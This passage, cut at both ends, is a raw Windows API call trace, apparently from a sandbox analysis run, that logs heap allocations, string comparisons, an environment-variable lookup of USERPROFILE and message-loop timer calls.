cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9zg.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0255.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.069] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0255.069] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0255.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.070] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.070] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0255.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0255.072] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.073] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0255.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0255.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0255.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0255.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0255.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0255.076] TranslateMessage (lpMsg=0x8bf710) returned 0 [0255.076] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0255.076] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0255.076] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0255.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.077] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0255.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0255.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.081] HeapFree (in: hHeap=0x25c0000, 